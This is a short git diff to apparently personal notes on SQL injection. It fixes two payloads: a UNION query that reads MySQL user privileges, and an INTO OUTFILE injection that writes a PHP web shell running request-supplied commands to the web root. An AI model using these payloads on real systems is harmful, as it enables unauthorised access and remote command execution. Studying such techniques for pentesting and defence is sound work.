--- a/_posts/notes/vulnerabilities/2021-12-12-sqli.md
+++ b/_posts/notes/vulnerabilities/2021-12-12-sqli.md
@@ -520,7 +520,7 @@ Or with an **UNION**:
 To get the privileges of the current user, first test if we have superadmin.
 ```sql
 SELECT super_priv FROM mysql.user
-'something' ' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- 
+'something' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- 
 ```
 
 If we have many user we can filter them:
@@ -595,7 +595,7 @@ Taking for example a PHP server and the following web shell:
 
 We can insert it:
 ```sql
-'something' union select "",'<?php system($_REQUEST[cmd]); ?>', "", "" into outfile '/var/www/html/shell.php'-- 
+'something' union select 1,'<?php system($_REQUEST[cmd]); ?>',3,4 into outfile '/var/www/html/shell.php'-- 
 ```
 
 And access it from the web.
